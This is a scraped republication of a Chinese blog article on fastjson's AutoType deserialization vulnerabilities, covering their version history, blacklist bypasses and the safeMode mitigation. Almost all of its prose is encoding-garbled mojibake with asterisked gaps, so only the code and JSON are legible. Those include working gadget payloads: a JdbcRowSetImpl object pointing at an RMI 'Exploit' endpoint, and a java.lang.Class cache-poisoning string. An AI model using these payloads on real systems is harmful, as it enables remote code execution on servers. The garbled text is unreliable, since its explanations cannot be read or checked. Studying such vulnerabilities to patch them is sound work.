fastjson鍒板簳鍋氶敊浜嗕粈涔堬紵涓轰粈涔堜細琚绻佺垎鍑烘紡娲烇紵

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了fastjson鍒板簳鍋氶敊浜嗕粈涔堬紵涓轰粈涔堜細琚绻佺垎鍑烘紡娲烇紵相关的知识,希望对你有一定的参考价值。

鏍囩锛?a href='http://www.mamicode.com/so/1/%e6%89%a7%e8%a1%8c%e5%91%bd%e4%bb%a4' title='鎵ц鍛戒护'>鎵ц鍛戒护   comm   ret   鍘熷绫诲瀷   涓€涓汉   safe   璁捐   

fastjson鍒板簳鍋氶敊浜嗕粈涔堬紵涓轰粈涔堜細琚绻佺垎鍑烘紡娲烇紵

鏀跺綍浜庤瘽棰?br/>#fastjson 4 #闃块噷宸村反 893 #绋嬪簭鍛?1975
鈻矵ollis, 涓€涓Coding鏈夌潃鐙壒杩芥眰鐨勪汉鈻?br/>鎶€鏈浘鐗? src=
杩欐槸Hollis鐨勭 290 绡囧師鍒涘垎浜?br/>浣滆€?l Hollis
鏉ユ簮 l Hollis锛圛D锛歨ollischuang锛?/p>

fastjson澶у涓€瀹氶兘涓嶉檶鐢燂紝杩欐槸闃块噷宸村反鐨勫紑婧愪竴涓狫SON瑙f瀽搴擄紝閫氬父琚敤浜庡皢Java Bean鍜孞SON 瀛楃涓蹭箣闂磋繘琛岃浆鎹€?br/>鍓嶆鏃堕棿锛宖astjson琚垎鍑鸿繃澶氭瀛樺湪婕忔礊锛屽緢澶氭枃绔犳姤閬撲簡杩欎欢浜嬪効锛屽苟涓旂粰鍑轰簡鍗囩骇寤鸿銆?br/>浣嗘槸浣滀负涓€涓紑鍙戣€咃紝鎴戞洿鍏虫敞鐨勬槸浠栦负浠€涔堜細棰戠箒琚垎婕忔礊锛熶簬鏄垜甯︾潃鐤戞儜锛屽幓鐪嬩簡涓媐astjson鐨剅eleaseNote浠ュ強閮ㄥ垎婧愪唬鐮併€?br/>鏈€缁堝彂鐜帮紝杩欏叾瀹炲拰fastjson涓殑涓€涓狝utoType鐗规€ф湁鍏炽€?br/>浠?019骞?鏈堜唤鍙戝竷鐨剉1.2.59涓€鐩村埌2020骞?鏈堜唤鍙戝竷鐨?v1.2.71 锛屾瘡涓増鏈殑鍗囩骇涓兘鏈夊叧浜嶢utoType鐨勫崌绾с€?br/>涓嬮潰鏄痜astjson鐨勫畼鏂箁eleaseNotes 涓紝鍑犳鍏充簬AutoType鐨勯噸瑕佸崌绾э細

1.2.59鍙戝竷锛屽寮篈utoType鎵撳紑鏃剁殑瀹夊叏鎬?fastjson
1.2.60鍙戝竷锛屽鍔犱簡AutoType榛戝悕鍗曪紝淇鎷掔粷鏈嶅姟瀹夊叏闂 fastjson
1.2.61鍙戝竷锛屽鍔燗utoType瀹夊叏榛戝悕鍗?fastjson
1.2.62鍙戝竷锛屽鍔燗utoType榛戝悕鍗曘€佸寮烘棩鏈熷弽搴忓垪鍖栧拰JSONPath fastjson
1.2.66鍙戝竷锛孊ug淇瀹夊叏鍔犲浐锛屽苟涓斿仛瀹夊叏鍔犲浐锛岃ˉ鍏呬簡AutoType榛戝悕鍗?fastjson
1.2.67鍙戝竷锛孊ug淇瀹夊叏鍔犲浐锛岃ˉ鍏呬簡AutoType榛戝悕鍗?fastjson
1.2.68鍙戝竷锛屾敮鎸丟EOJSON锛岃ˉ鍏呬簡AutoType榛戝悕鍗曘€傦紙寮曞叆涓€涓猻afeMode鐨勯厤缃紝閰嶇疆safeMode鍚庯紝鏃犺鐧藉悕鍗曞拰榛戝悕鍗曪紝閮戒笉鏀寔autoType銆傦級 fastjson
1.2.69鍙戝竷锛屼慨澶嶆柊鍙戠幇楂樺嵄AutoType寮€鍏崇粫杩囧畨鍏ㄦ紡娲烇紝琛ュ厖浜咥utoType榛戝悕鍗?fastjson
1.2.70鍙戝竷锛屾彁鍗囧吋瀹规€э紝琛ュ厖浜咥utoType榛戝悕鍗?/code>

鐢氳嚦鍦╢astjson鐨勫紑婧愬簱涓紝鏈変竴涓狪suue鏄缓璁綔鑰呮彁渚涗笉甯utoType鐨勭増鏈細鎶€鏈浘鐗? src=
-w747
?閭d箞锛屼粈涔堟槸AutoType锛熶负浠€涔坒astjson瑕佸紩鍏utoType锛熶负浠€涔圓utoType浼氬鑷村畨鍏ㄦ紡娲炲憿锛熸湰鏂囧氨鏉ユ繁鍏ュ垎鏋愪竴涓嬨€?/p>

AutoType 浣曟柟绁炲湥锛?br/>fastjson鐨勪富瑕佸姛鑳藉氨鏄皢Java Bean搴忓垪鍖栨垚JSON瀛楃涓诧紝杩欐牱寰楀埌瀛楃涓蹭箣鍚庡氨鍙互閫氳繃鏁版嵁搴撶瓑鏂瑰紡杩涜鎸佷箙鍖栦簡銆?br/>浣嗘槸锛宖astjson鍦ㄥ簭鍒楀寲浠ュ強鍙嶅簭鍒楀寲鐨勮繃绋嬩腑骞舵病鏈変娇鐢↗ava鑷甫鐨勫簭鍒楀寲鏈哄埗锛岃€屾槸鑷畾涔変簡涓€濂楁満鍒躲€?br/>鍏跺疄锛屽浜嶫SON妗嗘灦鏉ヨ锛屾兂瑕佹妸涓€涓狫ava瀵硅薄杞崲鎴愬瓧绗︿覆锛屽彲浠ユ湁涓ょ閫夋嫨锛?br/>1銆佸熀浜庡睘鎬?br/>2銆佸熀浜巗etter/getter
鑰屾垜浠墍甯哥敤鐨凧SON搴忓垪鍖栨鏋朵腑锛孎astJson鍜宩ackson鍦ㄦ妸瀵硅薄搴忓垪鍖栨垚json瀛楃涓茬殑鏃跺€欙紝鏄€氳繃閬嶅巻鍑鸿绫讳腑鐨勬墍鏈塯etter鏂规硶杩涜鐨勩€侴son骞朵笉鏄繖涔堝仛鐨勶紝浠栨槸閫氳繃鍙嶅皠閬嶅巻璇ョ被涓殑鎵€鏈夊睘鎬э紝骞舵妸鍏跺€煎簭鍒楀寲鎴恓son銆?br/>鍋囪鎴戜滑鏈変互涓嬩竴涓狫ava绫伙細

class Store {

    private String name;

    private Fruit fruit;

    public String getName() {

        return name;

    }

    public void setName(String name) {

        this.name = name;

    }

    public Fruit getFruit() {

        return fruit;

    }

    public void setFruit(Fruit fruit) {

        this.fruit = fruit;

    }

}

interface Fruit {

}

class Apple implements Fruit {

    private BigDecimal price;

    //鐪佺暐 setter/getter銆乼oString绛?
}

褰撴垜浠瀵逛粬杩涜搴忓垪鍖栫殑鏃跺€欙紝fastjson浼氭壂鎻忓叾涓殑getter鏂规硶锛屽嵆鎵惧埌getName鍜実etFruit锛岃繖鏃跺€欏氨浼氬皢name鍜宖ruit涓や釜瀛楁鐨勫€煎簭鍒楀寲鍒癑SON瀛楃涓蹭腑銆?br/>閭d箞闂鏉ヤ簡锛屾垜浠笂闈㈢殑瀹氫箟鐨凢ruit鍙槸涓€涓帴鍙o紝搴忓垪鍖栫殑鏃跺€檉astjson鑳藉鎶婂睘鎬у€兼纭簭鍒楀寲鍑烘潵鍚楋紵濡傛灉鍙互鐨勮瘽锛岄偅涔堝弽搴忓垪鍖栫殑鏃跺€欙紝fastjson浼氭妸杩欎釜fruit鍙嶅簭鍒楀寲鎴愪粈涔堢被鍨嬪憿锛?br/>鎴戜滑灏濊瘯鐫€楠岃瘉涓€涓嬶紝鍩轰簬(fastjson v 1.2.68)锛?/p>

Store store = new Store();

store.setName("Hollis");

Apple apple = new Apple();

apple.setPrice(new BigDecimal(0.5));

store.setFruit(apple);

String jsonString = JSON.toJSONString(store);

System.out.println("toJSONString : " + jsonString);

浠ヤ笂浠g爜姣旇緝绠€鍗曪紝鎴戜滑鍒涘缓浜嗕竴涓猻tore锛屼负浠栨寚瀹氫簡鍚嶇О锛屽苟涓斿垱寤轰簡涓€涓狥ruit鐨勫瓙绫诲瀷Apple锛岀劧鍚庡皢杩欎釜store浣跨敤JSON.toJSONString杩涜搴忓垪鍖栵紝鍙互寰楀埌浠ヤ笅JSON鍐呭锛?/p>


toJSONString : {"fruit":{"price":0.5},"name":"Hollis"}

閭d箞锛岃繖涓猣ruit鐨勭被鍨嬪埌搴曟槸浠€涔堝憿锛岃兘鍚﹀弽搴忓垪鍖栨垚Apple鍛紵鎴戜滑鍐嶆潵鎵ц浠ヤ笅浠g爜锛?/p>

Store newStore = JSON.parseObject(jsonString, Store.class);

System.out.println("parseObject : " + newStore);

Apple newApple = (Apple)newStore.getFruit();

System.out.println("getFruit : " + newApple);

鎵ц缁撴灉濡備笅锛?/p>

toJSONString : {"fruit":{"price":0.5},"name":"Hollis"}

parseObject : Store{name=鈥楬ollis鈥? fruit={}}

Exception in thread "main" java.lang.ClassCastException: com.hollis.lab.fastjson.test.$Proxy0 cannot be cast to com.hollis.lab.fastjson.test.Apple

at com.hollis.lab.fastjson.test.FastJsonTest.main(FastJsonTest.java:26)

鍙互鐪嬪埌锛屽湪灏唖tore鍙嶅簭鍒楀寲涔嬪悗锛屾垜浠皾璇曞皢Fruit杞崲鎴怉pple锛屼絾鏄姏鍑轰簡寮傚父锛屽皾璇曠洿鎺ヨ浆鎹㈡垚Fruit鍒欎笉浼氭姤閿欙紝濡傦細

Fruit newFruit = newStore.getFruit();

System.out.println("getFruit : " + newFruit);

浠ヤ笂鐜拌薄锛屾垜浠煡閬擄紝褰撲竴涓被涓寘鍚簡涓€涓帴鍙o紙鎴栨娊璞$被锛夌殑鏃跺€欙紝鍦ㄤ娇鐢╢astjson杩涜搴忓垪鍖栫殑鏃跺€欙紝浼氬皢瀛愮被鍨嬫姽鍘伙紝鍙繚鐣欐帴鍙o紙鎶借薄绫伙級鐨勭被鍨嬶紝浣垮緱鍙嶅簭鍒楀寲鏃舵棤娉曟嬁鍒板師濮嬬被鍨嬨€?br/>閭d箞鏈変粈涔堝姙娉曡В鍐宠繖涓棶棰樺憿锛宖astjson寮曞叆浜咥utoType锛屽嵆鍦ㄥ簭鍒楀寲鐨勬椂鍊欙紝鎶婂師濮嬬被鍨嬭褰曚笅鏉ャ€?br/>浣跨敤鏂规硶鏄€氳繃SerializerFeature.WriteClassName杩涜鏍囪锛屽嵆灏嗕笂杩颁唬鐮佷腑鐨?/p>

String jsonString = JSON.toJSONString(store);

淇敼鎴愶細

String jsonString = JSON.toJSONString(store,SerializerFeature.WriteClassName);

鍗冲彲锛屼互涓婁唬鐮侊紝杈撳嚭缁撴灉濡備笅锛?/p>

System.out.println("toJSONString : " + jsonString);

{

    "@type":"com.hollis.lab.fastjson.test.Store",

    "fruit":{

        "@type":"com.hollis.lab.fastjson.test.Apple",

        "price":0.5

    },

    "name":"Hollis"

}

鍙互鐪嬪埌锛屼娇鐢⊿erializerFeature.WriteClassName杩涜鏍囪鍚庯紝JSON瀛楃涓蹭腑澶氬嚭浜嗕竴涓狜type瀛楁锛屾爣娉ㄤ簡绫诲搴旂殑鍘熷绫诲瀷锛屾柟渚垮湪鍙嶅簭鍒楀寲鐨勬椂鍊欏畾浣嶅埌鍏蜂綋绫诲瀷
濡備笂锛屽皢搴忓垪鍖栧悗鐨勫瓧绗︿覆鍦ㄥ弽搴忓垪鍖栵紝鏃㈠彲浠ラ『鍒╃殑鎷垮埌涓€涓狝pple绫诲瀷锛屾暣浣撹緭鍑哄唴瀹癸細

toJSONString : {"@type":"com.hollis.lab.fastjson.test.Store","fruit":{"@type":"com.hollis.lab.fastjson.test.Apple","price":0.5},"name":"Hollis"}

parseObject : Store{name=鈥楬ollis鈥? fruit=Apple{price=0.5}}

getFruit : Apple{price=0.5}

杩欏氨鏄疉utoType锛屼互鍙奻astjson涓紩鍏utoType鐨勫師鍥犮€?br/>浣嗘槸锛屼篃姝f槸杩欎釜鐗规€э紝鍥犱负鍦ㄥ姛鑳借璁′箣鍒濆湪瀹夊叏鏂归潰鑰冭檻鐨勪笉澶熷懆鍏紝涔熺粰鍚庣画fastjson浣跨敤鑰呭甫鏉ヤ簡鏃犲敖鐨勭棝鑻?/p>

AutoType 浣曢敊涔嬫湁锛?a href="mailto:br/>鍥犱负鏈変簡autoType鍔熻兘锛岄偅涔坒astjson鍦ㄥJSON瀛楃涓茶繘琛屽弽搴忓垪鍖栫殑鏃跺€欙紝灏变細璇诲彇@type鍒板唴瀹癸紝璇曞浘鎶奐SON鍐呭鍙嶅簭鍒楀寲鎴愯繖涓璞★紝骞朵笖浼氳皟鐢ㄨ繖涓被鐨剆etter鏂规硶銆?br/" rel="nofollow">br/>鍥犱负鏈変簡autoType鍔熻兘锛岄偅涔坒astjson鍦ㄥJSON瀛楃涓茶繘琛屽弽搴忓垪鍖栫殑鏃跺€欙紝灏变細璇诲彇@type鍒板唴瀹癸紝璇曞浘鎶奐SON鍐呭鍙嶅簭鍒楀寲鎴愯繖涓璞★紝骞朵笖浼氳皟鐢ㄨ繖涓被鐨剆etter鏂规硶銆?br/閭d箞灏卞彲浠ュ埄鐢ㄨ繖涓壒鎬э紝鑷繁鏋勯€犱竴涓狫SON瀛楃涓诧紝骞朵笖浣跨敤@type鎸囧畾涓€涓嚜宸辨兂瑕佷娇鐢ㄧ殑***绫诲簱銆?br/>涓句釜渚嬪瓙锛?**姣旇緝甯哥敤鐨?**绫诲簱鏄痗om.sun.rowset.JdbcRowSetImpl锛岃繖鏄痵un瀹樻柟鎻愪緵鐨勪竴涓被搴擄紝杩欎釜绫荤殑dataSourceName鏀寔浼犲叆涓€涓猺mi鐨勬簮锛屽綋瑙f瀽杩欎釜uri鐨勬椂鍊欙紝灏变細鏀寔rmi杩滅▼璋冪敤锛屽幓鎸囧畾鐨剅mi鍦板潃涓幓璋冪敤鏂规硶銆?br/>鑰宖astjson鍦ㄥ弽搴忓垪鍖栨椂浼氳皟鐢ㄧ洰鏍囩被鐨剆etter鏂规硶锛岄偅涔堝鏋?**鍦↗dbcRowSetImpl鐨刣ataSourceName涓缃簡涓€涓兂瑕佹墽琛岀殑鍛戒护锛岄偅涔堝氨浼氬鑷村緢涓ラ噸鐨勫悗鏋溿€?br/>濡傞€氳繃浠ヤ笅鏂瑰紡瀹氫竴涓狫SON涓诧紝鍗冲彲瀹炵幇杩滅▼鍛戒护鎵ц锛堝湪鏃╂湡鐗堟湰涓紝鏂扮増鏈腑JdbcRowSetImpl宸茬粡琚姞浜嗛粦鍚嶅崟锛?/p>


{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}

杩欏氨鏄墍璋撶殑杩滅▼鍛戒护鎵ц婕忔礊锛屽嵆鍒╃敤婕忔礊***鍒扮洰鏍囨湇鍔″櫒锛岄€氳繃鏈嶅姟鍣ㄦ墽琛屽懡浠ゃ€?br/>鍦ㄦ棭鏈熺殑fastjson鐗堟湰涓紙v1.2.25 涔嬪墠锛夛紝鍥犱负AutoType鏄粯璁ゅ紑鍚殑锛屽苟涓斾篃娌℃湁浠€涔堥檺鍒讹紝鍙互璇存槸瑁哥潃鐨勩€?br/>浠巚1.2.25寮€濮嬶紝fastjson榛樿鍏抽棴浜哸utotype鏀寔锛屽苟涓斿姞鍏ヤ簡checkAutotype锛屽姞鍏ヤ簡榛戝悕鍗?鐧藉悕鍗曟潵闃插尽autotype寮€鍚殑鎯呭喌銆?br/>浣嗘槸锛屼篃鏄粠杩欎釜鏃跺€欏紑濮嬶紝***鍜宖astjson浣滆€呬箣闂寸殑鍗氬紙灏卞紑濮嬩簡銆?br/>鍥犱负fastjson榛樿鍏抽棴浜哸utotype鏀寔锛屽苟涓斿仛浜嗛粦鐧藉悕鍗曠殑鏍¢獙锛屾墍浠?**鏂瑰悜灏辫浆鍙樻垚浜?quot;濡備綍缁曡繃checkAutotype"銆?br/>涓嬮潰灏辨潵缁嗘暟涓€涓嬪悇涓増鏈殑fastjson涓瓨鍦ㄧ殑婕忔礊浠ュ強***鍘熺悊锛岀敱浜庣瘒骞呴檺鍒讹紝杩欓噷骞朵笉浼氳瑙g殑鐗瑰埆缁嗚妭锛屽鏋滃ぇ瀹舵劅鍏磋叮鎴戝悗闈㈠彲浠ュ崟鐙啓涓€绡囨枃绔犺璁茬粏鑺傘€備笅闈㈢殑鍐呭涓昏鏄彁渚涗竴浜涙€濊矾锛岀洰鐨勬槸璇存槑鍐欎唬鐮佺殑鏃跺€欐敞鎰忓畨鍏ㄦ€х殑閲嶈鎬с€?br/>缁曡繃checkAutotype锛?**涓巉astjson鐨勫崥寮?/p>

鍦╢astjson v1.2.41 涔嬪墠锛屽湪checkAutotype鐨勪唬鐮佷腑锛屼細鍏堣繘琛岄粦鐧藉悕鍗曠殑杩囨护锛屽鏋滆鍙嶅簭鍒楀寲鐨勭被涓嶅湪榛戠櫧鍚嶅崟涓紝閭d箞鎵嶄細瀵圭洰鏍囩被杩涜鍙嶅簭鍒楀寲銆?br/>浣嗘槸鍦ㄥ姞杞界殑杩囩▼涓紝fastjson鏈変竴娈电壒娈婄殑澶勭悊锛岄偅灏辨槸鍦ㄥ叿浣撳姞杞界被鐨勬椂鍊欎細鍘绘帀className鍓嶅悗鐨凩鍜?锛屽舰濡侺com.lang.Thread;銆?img alt="鎶€鏈浘鐗? src="http://image.mamicode.com/info/202010/20201027110239281526.png" alt="fastjson鍒板簳鍋氶敊浜嗕粈涔堬紵涓轰粈涔堜細琚绻佺垎鍑烘紡娲烇紵" />
-w853
?鑰岄粦鐧藉悕鍗曞張鏄€氳繃startWith妫€娴嬬殑锛岄偅涔?**鍙鍦ㄨ嚜宸辨兂瑕佷娇鐢ㄧ殑***绫诲簱鍓嶅悗鍔犱笂L鍜?灏卞彲浠ョ粫杩囬粦鐧藉悕鍗曠殑妫€鏌ヤ簡锛屼篃涓嶈€借琚玣astjson姝e父鍔犺浇銆?br/>濡侺com.sun.rowset.JdbcRowSetImpl;锛屼細鍏堥€氳繃鐧藉悕鍗曟牎楠岋紝鐒跺悗fastjson鍦ㄥ姞杞界被鐨勬椂鍊欎細鍘绘帀鍓嶅悗鐨凩鍜岋紝鍙樻垚浜哻om.sun.rowset.JdbcRowSetImpl銆?br/>涓轰簡閬垮厤琚?**锛屽湪涔嬪悗鐨?v1.2.42鐗堟湰涓紝鍦ㄨ繘琛岄粦鐧藉悕鍗曟娴嬬殑鏃跺€欙紝fastjson鍏堝垽鏂洰鏍囩被鐨勭被鍚嶇殑鍓嶅悗鏄笉鏄疞鍜?锛屽鏋滄槸鐨勮瘽锛屽氨鎴彇鎺夊墠鍚庣殑L鍜?鍐嶈繘琛岄粦鐧藉悕鍗曠殑鏍¢獙銆?br/>鐪嬩技瑙e喅浜嗛棶棰橈紝浣嗘槸***鍙戠幇浜嗚繖涓鍒欎箣鍚庯紝灏卞湪***鏃跺湪鐩爣绫诲墠鍚庡弻鍐橪L鍜?;锛岃繖鏍峰啀琚埅鍙栦箣鍚庤繕鏄彲浠ョ粫杩囨娴嬨€傚LLcom.sun.rowset.JdbcRowSetImpl;;
榄旈珮涓€灏猴紝閬撻珮涓€涓堛€傚湪 v1.2.43涓紝fastjson杩欐鍦ㄩ粦鐧藉悕鍗曞垽鏂箣鍓嶏紝澧炲姞浜嗕竴涓槸鍚︿互LL鏈紑澶寸殑鍒ゆ柇锛屽鏋滅洰鏍囩被浠L寮€澶达紝閭d箞灏辩洿鎺ユ姏寮傚父锛屼簬鏄氨鍙堢煭鏆傜殑淇浜嗚繖涓紡娲炪€?br/>***鍦↙鍜?杩欓噷璧颁笉閫氫簡锛屼簬鏄兂鍔炴硶浠庡叾浠栧湴鏂逛笅鎵嬶紝鍥犱负fastjson鍦ㄥ姞杞界被鐨勬椂鍊欙紝涓嶅彧瀵筁鍜?杩欐牱鐨勭被杩涜鐗规畩澶勭悊锛岃繕瀵筟涔熻鐗规畩澶勭悊浜嗐€?br/>鍚屾牱鐨?**鎵嬫锛屽湪鐩爣绫诲墠闈㈡坊鍔燵锛寁1.2.43浠ュ墠鐨勬墍鏈夌増鏈張娌﹂櫡浜嗐€?br/>浜庢槸锛屽湪 v1.2.44鐗堟湰涓紝fastjson鐨勪綔鑰呭仛浜嗘洿鍔犱弗鏍肩殑瑕佹眰锛屽彧瑕佺洰鏍囩被浠寮€澶存垨鑰呬互;缁撳熬锛岄兘鐩存帴鎶涘紓甯搞€備篃灏辫В鍐充簡 v1.2.43鍙婂巻鍙茬増鏈腑鍙戠幇鐨刡ug銆?br/>鍦ㄤ箣鍚庣殑鍑犱釜鐗堟湰涓紝***鐨勪富瑕佺殑***鏂瑰紡灏辨槸缁曡繃榛戝悕鍗曚簡锛岃€宖astjson涔熷湪涓嶆柇鐨勫畬鍠勮嚜宸辩殑榛戝悕鍗曘€?br/>autoType涓嶅紑鍚篃鑳借***锛?/p>

浣嗘槸濂芥櫙涓嶉暱锛屽湪鍗囩骇鍒?v1.2.47 鐗堟湰鏃讹紝***鍐嶆鎵惧埌浜嗗姙娉曟潵***銆傝€屼笖杩欎釜***鍙湁鍦╝utoType鍏抽棴鐨勬椂鍊欐墠鐢熸晥銆?br/>鏄笉鏄緢濂囨€紝autoType涓嶅紑鍚弽鑰屼細琚?**銆?br/>鍥犱负鍦╢astjson涓湁涓€涓叏灞€缂撳瓨锛屽湪绫诲姞杞界殑鏃跺€欙紝濡傛灉autotype娌″紑鍚紝浼氬厛灏濊瘯浠庣紦瀛樹腑鑾峰彇绫伙紝濡傛灉缂撳瓨涓湁锛屽垯鐩存帴杩斿洖銆?**姝f槸鍒╃敤杩欓噷鏈哄埗杩涜浜?**銆?br/>***鍏堟兂鍔炴硶鎶婁竴涓被鍔犲埌缂撳瓨涓紝鐒跺悗鍐嶆鎵ц鐨勬椂鍊欏氨鍙互缁曡繃榛戠櫧鍚嶅崟妫€娴嬩簡锛屽涔堣仾鏄庣殑鎵嬫銆?br/>棣栧厛鎯宠鎶婁竴涓粦鍚嶅崟涓殑绫诲姞鍒扮紦瀛樹腑锛岄渶瑕佷娇鐢ㄤ竴涓笉鍦ㄩ粦鍚嶅崟涓殑绫伙紝杩欎釜绫诲氨鏄痡ava.lang.Class
java.lang.Class绫诲搴旂殑deserializer涓篗iscCodec锛屽弽搴忓垪鍖栨椂浼氬彇json涓蹭腑鐨剉al鍊煎苟鍔犺浇杩欎釜val瀵瑰簲鐨勭被銆?br/>鎶€鏈浘鐗? src=
濡傛灉fastjson cache涓簍rue锛屽氨浼氱紦瀛樿繖涓獀al瀵瑰簲鐨刢lass鍒板叏灞€缂撳瓨涓?img alt="鎶€鏈浘鐗? src="http://image.mamicode.com/info/202010/20201027110239733934.png" alt="fastjson鍒板簳鍋氶敊浜嗕粈涔堬紵涓轰粈涔堜細琚绻佺垎鍑烘紡娲烇紵" />

濡傛灉鍐嶆鍔犺浇val鍚嶇О鐨勭被锛屽苟涓攁utotype娌″紑鍚紝涓嬩竴姝ュ氨鏄細灏濊瘯浠庡叏灞€缂撳瓨涓幏鍙栬繖涓猚lass锛岃繘鑰岃繘琛?**銆?br/>鎵€浠ワ紝***鍙渶瑕佹妸***绫讳吉瑁呬竴涓嬪氨琛屼簡锛屽涓嬫牸寮忥細


{"@type": "java.lang.Class","val": "com.sun.rowset.JdbcRowSetImpl"}

浜庢槸鍦?v1.2.48涓紝fastjson淇浜嗚繖涓猙ug锛屽湪MiscCodec涓紝澶勭悊Class绫荤殑鍦版柟锛岃缃簡fastjson cache涓篺alse锛岃繖鏍?**绫诲氨涓嶄細琚紦瀛樹簡锛屼篃灏变笉浼氳鑾峰彇鍒颁簡銆?br/>鍦ㄤ箣鍚庣殑澶氫釜鐗堟湰涓紝***涓巉astjson鍙堢户缁竴鐩撮兘鍦ㄧ粫杩囬粦鍚嶅崟銆佹坊鍔犻粦鍚嶅崟涓繘琛屽懆鏃嬨€?br/>鐩村埌鍚庢潵锛?**鍦?v1.2.68涔嬪墠鐨勭増鏈腑鍙堝彂鐜颁簡涓€涓柊鐨勬紡娲炲埄鐢ㄦ柟寮忋€?br/>鍒╃敤寮傚父杩涜***

鍦╢astjson涓紝 濡傛灉锛孈type 鎸囧畾鐨勭被涓?Throwable 鐨勫瓙绫伙紝閭e搴旂殑鍙嶅簭鍒楀寲澶勭悊绫诲氨浼氫娇鐢ㄥ埌 ThrowableDeserializer
鑰屽湪ThrowableDeserializer#deserialze鐨勬柟娉曚腑锛屽綋鏈変竴涓瓧娈电殑key涔熸槸 @type鏃讹紝灏变細鎶婅繖涓?value 褰撳仛绫诲悕锛岀劧鍚庤繘琛屼竴娆?checkAutoType 妫€娴嬨€?br/>骞朵笖鎸囧畾浜唀xpectClass涓篢hrowable.class锛屼絾鏄湪checkAutoType涓紝鏈夎繖鏍蜂竴绾﹀畾锛岄偅灏辨槸濡傛灉鎸囧畾浜唀xpectClass 锛岄偅涔堜篃浼氶€氳繃鏍¢獙銆?img alt="鎶€鏈浘鐗? src="http://image.mamicode.com/info/202010/20201027110239811936.png" alt="fastjson鍒板簳鍋氶敊浜嗕粈涔堬紵涓轰粈涔堜細琚绻佺垎鍑烘紡娲烇紵" />
-w869
?鍥犱负fastjson鍦ㄥ弽搴忓垪鍖栫殑鏃跺€欎細灏濊瘯鎵ц閲岄潰鐨刧etter鏂规硶锛岃€孍xception绫讳腑閮芥湁涓€涓猤etMessage鏂规硶銆?br/>***鍙渶瑕佽嚜瀹氫箟涓€涓紓甯革紝骞朵笖閲嶅啓鍏秅etMessage灏辫揪鍒颁簡***鐨勭洰鐨勩€?br/>杩欎釜婕忔礊灏辨槸6鏈堜唤鍏ㄧ綉鐤紶鐨勯偅涓?quot;涓ラ噸婕忔礊"锛屼娇寰楀緢澶氬紑鍙戣€呬笉寰椾笉鍗囩骇鍒版柊鐗堟湰銆?br/>杩欎釜婕忔礊鍦?v1.2.69涓淇锛屼富瑕佷慨澶嶆柟寮忔槸瀵逛簬闇€瑕佽繃婊ゆ帀鐨別xpectClass杩涜浜嗕慨鏀癸紝鏂板浜?涓柊鐨勭被锛屽苟涓斿皢鍘熸潵鐨凜lass绫诲瀷鐨勫垽鏂慨鏀逛负hash鐨勫垽鏂€?br/>鍏跺疄锛屾牴鎹甪astjson鐨勫畼鏂规枃妗d粙缁嶏紝鍗充娇涓嶅崌绾у埌鏂扮増锛屽湪v1.2.68涓篃鍙互瑙勯伩鎺夎繖涓棶棰橈紝閭e氨鏄娇鐢╯afeMode

AutoType 瀹夊叏妯″紡锛?br/>鍙互鐪嬪埌锛岃繖浜涙紡娲炵殑鍒╃敤鍑犱箮閮芥槸鍥寸粫AutoType鏉ョ殑锛屼簬鏄紝鍦?v1.2.68鐗堟湰涓紝寮曞叆浜唖afeMode锛岄厤缃畇afeMode鍚庯紝鏃犺鐧藉悕鍗曞拰榛戝悕鍗曪紝閮戒笉鏀寔autoType锛屽彲涓€瀹氱▼搴︿笂缂撹В鍙嶅簭鍒楀寲Gadgets绫诲彉绉?**銆?br/>璁剧疆浜唖afeMode鍚庯紝@type 瀛楁涓嶅啀鐢熸晥锛屽嵆褰撹В鏋愬舰濡倇"@type": "com.java.class"}鐨凧SON涓叉椂锛屽皢涓嶅啀鍙嶅簭鍒楀寲鍑哄搴旂殑绫汇€?br/>寮€鍚痵afeMode鏂瑰紡濡備笅锛?/p>


ParserConfig.getGlobalInstance().setSafeMode(true);

濡傚湪鏈枃鐨勬渶寮€濮嬬殑浠g爜绀轰緥涓紝浣跨敤浠ヤ笂浠g爜寮€鍚痵afeMode妯″紡锛屾墽琛屼唬鐮侊紝浼氬緱鍒颁互涓嬪紓甯革細

Exception in thread "main" com.alibaba.fastjson.JSONException: safeMode not support autoType : com.hollis.lab.fastjson.test.Apple

at com.alibaba.fastjson.parser.ParserConfig.checkAutoType(ParserConfig.java:1244)

浣嗘槸鍊煎緱娉ㄦ剰鐨勬槸锛屼娇鐢ㄨ繖涓姛鑳斤紝fastjson浼氱洿鎺ョ鐢╝utoType鍔熻兘锛屽嵆鍦╟heckAutoType鏂规硶涓紝鐩存帴鎶涘嚭涓€涓紓甯搞€?br/>-w821鎶€鏈浘鐗? src=

鍚庤瘽
鐩墠fastjson宸茬粡鍙戝竷鍒颁簡 v1.2.72鐗堟湰锛屽巻鍙茬増鏈腑瀛樺湪鐨勫凡鐭ラ棶棰樺湪鏂扮増鏈腑鍧囧凡淇銆?br/>寮€鍙戣€呭彲浠ュ皢鑷繁椤圭洰涓娇鐢ㄧ殑fastjson鍗囩骇鍒版渶鏂扮増锛屽苟涓斿鏋滀唬鐮佷腑涓嶉渶瑕佺敤鍒癆utoType鐨勮瘽锛屽彲浠ヨ€冭檻浣跨敤safeMode锛屼絾鏄璇勪及涓嬪鍘嗗彶浠g爜鐨勫奖鍝嶃€?br/>鍥犱负fastjson鑷繁瀹氫箟浜嗗簭鍒楀寲宸ュ叿绫伙紝骞朵笖浣跨敤asm鎶€鏈伩鍏嶅弽灏勩€佷娇鐢ㄧ紦瀛樸€佸苟涓斿仛浜嗗緢澶氱畻娉曚紭鍖栫瓑鏂瑰紡锛屽ぇ澶ф彁鍗囦簡搴忓垪鍖栧強鍙嶅簭鍒楀寲鐨勬晥鐜囥€?br/>涔嬪墠鏈夌綉鍙嬪姣旇繃锛?img alt="鎶€鏈浘鐗? src="http://image.mamicode.com/info/202010/20201027110240170743.png" alt="fastjson鍒板簳鍋氶敊浜嗕粈涔堬紵涓轰粈涔堜細琚绻佺垎鍑烘紡娲烇紵" />
-w808
